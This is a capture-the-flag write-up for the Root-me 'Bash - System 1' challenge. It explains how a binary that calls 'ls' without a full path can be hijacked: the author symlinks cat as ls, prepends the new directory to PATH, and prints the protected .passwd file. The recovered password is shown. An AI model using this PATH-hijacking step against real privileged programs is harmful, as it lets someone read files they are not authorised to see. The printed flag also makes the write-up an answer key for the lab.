Root-me.org

Bash - System 1

Try to find your path padawan !

A different type of challenge, on this once we need to find a way to read .passwd. We also got access to the source code of the binary.

#include <stdlib.h>
#include <stdio.h>
 
/* gcc -m32 -o ch11 ch11.c */
 
int main(void) 
{
	system("ls /challenge/app-script/ch11/.passwd"); 
	return 0;
}

This breaks a big rule, always use full path when you write a script.

We can abuse this by changing the PATH and creating a symlink of cat and renaming it to ls. We’ll be putting our new path before the other paths.

Since the code uses ls on the file we want to read this change should be get us the content of it.

app-script-ch11@challenge02:~$ mkdir -p /tmp/custom/
app-script-ch11@challenge02:~$ ln -s /bin/cat /tmp/custom/ls
app-script-ch11@challenge02:~$ export PATH=/tmp/custom:$PATH
app-script-ch11@challenge02:~$ ./ch11
!oPe96a/.s8d5